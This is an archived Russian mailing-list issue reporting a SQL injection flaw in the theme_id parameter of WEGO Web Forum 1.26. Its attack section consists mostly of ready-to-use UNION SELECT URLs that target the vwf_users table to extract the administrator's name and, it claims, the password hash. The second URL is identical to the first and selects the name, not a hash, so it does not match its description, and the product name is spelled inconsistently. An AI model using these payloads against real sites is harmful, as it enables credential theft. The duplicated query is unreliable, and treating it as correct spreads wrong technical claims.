Отправляет email-рассылки с помощью сервиса Sendsay
  Все выпуски  

Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в VEGO Web Forum.


Информационный Канал Subscribe.Ru

Компьютер для продвинутых пользователей
Содержание:
WEGO Veb Forum
ПО: WEGO Veb Forum
Версия: 1.26

Описание:
Уязвимости находятся в:
php/functions.php
php/functions_update.php
php/functions_display.php
Уязвимость находится в theme_id и позволит ввести SQL-инъекцию.
Для получения административного имени пользователя:
http://hostname/webforum/index.php? theme_id=-1% 20union%20select% 201,2,name, 4,5%20from% 20vwf_users% 20where%20userid=1/*
Для получения хеш пароля администратора:
http://hostname/webforum/index.php? theme_id=-1% 20union%20select% 201,2,name, 4,5%20from% 20vwf_users% 20where%20userid=1/*
WEGO Veb Forum
Рассылка создана и ведется при поддержке Информационной сети Пермского края.

Subscribe.Ru
Поддержка подписчиков
Другие рассылки этой тематики
Другие рассылки этого автора
Подписан адрес:
Код этой рассылки: comp.paper.supuser
Архив рассылки
Отписаться Вебом Почтой
Вспомнить пароль

В избранное